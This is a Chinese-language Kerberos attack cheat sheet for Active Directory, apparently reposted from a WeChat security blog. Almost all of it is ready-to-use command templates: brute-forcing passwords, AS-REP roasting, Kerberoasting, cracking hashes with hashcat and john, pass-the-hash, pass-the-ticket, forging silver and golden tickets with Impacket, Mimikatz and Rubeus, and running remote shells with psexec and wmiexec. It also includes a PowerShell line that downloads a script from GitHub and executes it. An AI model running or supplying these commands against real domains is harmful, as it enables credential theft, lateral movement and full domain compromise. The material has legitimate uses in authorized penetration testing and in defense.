专栏首页Bypass域渗透 | Kerberos攻击速查表

域渗透 | Kerberos攻击速查表

0x01 暴力破解

使用kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

使用带有暴力破解模块的Rubeus版本:

# with a list of users.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

0x02 ASPEPRoast

使用Impacket的示例GetNPUsers.py:

# check ASREPRoast for all domain users (credentials required)python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file># check ASREPRoast for a list of users (no credentials required)python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

使用Rubeus:

# check ASREPRoast for all users in current domain.\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

密码字典破解:

hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
john --wordlist=<passwords_file> <AS_REP_responses_file>

0x03 Kerberoasting攻击

使用Impacket示例GetUserSPNs.py:

python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>

使用Rubeus:

.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>

使用Powershell

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>

密码字典破解:

hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>

0x04 Pass The Hash & Pass The Key

通过使用Impacket示例:

# Request the TGT with hashpython getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash># Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)python getTGT.py <domain_name>/<user_name> -aesKey <aes_key># Request the TGT with passwordpython getTGT.py <domain_name>/<user_name>:[password]# If not provided, password is asked# Set the TGT for impacket useexport KRB5CCNAME=<TGT_ccache_file># Execute remote commands with any of the following by using the TGTpython psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

使用Rubeus和PsExec:

# Ask and inject the ticket.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt# Execute a cmd in the remote machine.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x05 Pass The Ticket (PTT)

从Linux中获得tickets

检查tickets的类型和位置:

grep default_ccache_name /etc/krb5.conf

如果没有返回,则默认为FILE:/tmp/krb5cc_%{uid}

如果是tickets文件,则可以复制粘贴(如果有权限)以使用它们。

如果是KEYRING tickets,你可以使用tickey来获取:

# To dump current user tickets, if root, try to dump them all by injecting in other user processes# to inject, copy tickey in a reachable folder by all userscp tickey /tmp/tickey
/tmp/tickey -i

从Windows中获得tickets

使用Mimikatz:

mimikatz # sekurlsa::tickets /export

在Powershell中使用Rubeus:

.\Rubeus dump# After dump with Rubeus tickets in base64, to write the in a file[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))

使用ticket_converter.py在Linux / Windows格式之间转换tickets:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

在Linux中使用ticket:

使用Impacket示例:

# Set the ticket for impacket useexport KRB5CCNAME=<TGT_ccache_file_path># Execute remote commands with any of the following by using the TGTpython psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

在Windows中使用ticket:

使用Mimikatz注入ticket:

mimikatz # kerberos::ptt <ticket_kirbi_file>

使用Rubeus注入ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

使用PsExec在远程计算机中执行cmd :

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x06 Silver ticket

使用Impacket示例:

# To generate the TGS with NTLMpython ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name># To generate the TGS with AES keypython ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpython psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

使用Mimikatz:

# To generate the TGS with NTLMmimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 128 keymimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname># Inject TGS with Mimikatzmimikatz # kerberos::ptt <ticket_kirbi_file>

使用 Rubeus注入ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

使用PsExec在远程计算机中执行cmd :

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x07 Golden ticket

使用 Impacket 示例:

# To generate the TGT with NTLMpython ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name># To generate the TGT with AES keypython ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name># Set the ticket for impacket useexport KRB5CCNAME=<TGS_ccache_file># Execute remote commands with any of the following by using the TGTpython psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

使用 Mimikatz:

# To generate the TGT with NTLMmimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name># To generate the TGT with AES 128 keymimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name># To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name># Inject TGT with Mimikatzmimikatz # kerberos::ptt <ticket_kirbi_file>

使用Rubeus注入ticket:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

使用PsExec在远程计算机中执行cmd :

.\PsExec.exe -accepteula \\<remote_hostname> cmd

0x08 杂项

已知密码获取NTLM:

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

0x09 相关工具

kerbrute.py:https://github.com/TarlogicSecurity/kerbrute
Rubeus:https://github.com/Zer1t0/Rubeus
PsExec:https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Impacket:https://github.com/SecureAuthCorp/impacket
tickey:https://github.com/TarlogicSecurity/tickey
Mimikatz:https://github.com/gentilkiwi/mimikatz

本文分享自微信公众号 - Bypass(Bypass--),作者:Bypass

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 【代码审计】两个简单的CSRF漏洞实例

    CSRF(Cross-site request forgery)跨站请求伪造,通过伪装来自受信任用户的请求来利用受信任的网站,这边分享两个漏洞代码示例。

    Bypass
  • 【应用安全】S-SDLC安全开发生命周期

    OWASP Secure Software Development Lifecycle Project(S-SDLC)是OWASP组织首个由OWASP中国团队独...

    Bypass
  • Linux应急响应(一):SSH暴力破解

    SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。SSH口令长度太...

    Bypass
  • java多线程下如何调用一个共同的内存单元(调用同一个对象)

    1 /* 2 * 关于线程下共享相同的内存单元(包括代码与数据) 3 * ,并利用这些共享单元来实现数据交换,实时通信与必要的同步操作。 4 * ...

    Gxjun
  • __name__ 到底是个什么玩意?

    大家应该已经在很多 Python 脚本里见到过 __name__ 变量了吧?它经常是以类似这样的方式出现在我们的程序里:

    Python进击者
  • MySql[二]

    视图就是一个虚拟表(非真实存在),其本质是[根据SQL语句获取动态的数据集,并为其命名],用户使用时只需要使用[名称]即可获取结果集并可以将其当做代表来使用·

    Wyc
  • 重温java代理模式

    我是攻城师
  • [linux][kprobe]谁动了我的文件---使用kprobe找到目标进程

    问题场景: 云计算IaaS平台上,经常使用libvirt+qemu-kvm做基础平台。libvirt会在/etc/libvirt/qemu/目录下,保存很多份q...

    皮振伟
  • (四)SpringBoot2.0基础篇- 多数据源,JdbcTemplate和JpaRepository

  • Spring Boot+JPA+Mysql完成数据库整合操作

    Spring Boot结合JPA操作Mysql数据库十分方便,可以做到零配置文件。具体流程如下。

    itlemon

扫码关注云+社区

领取腾讯云代金券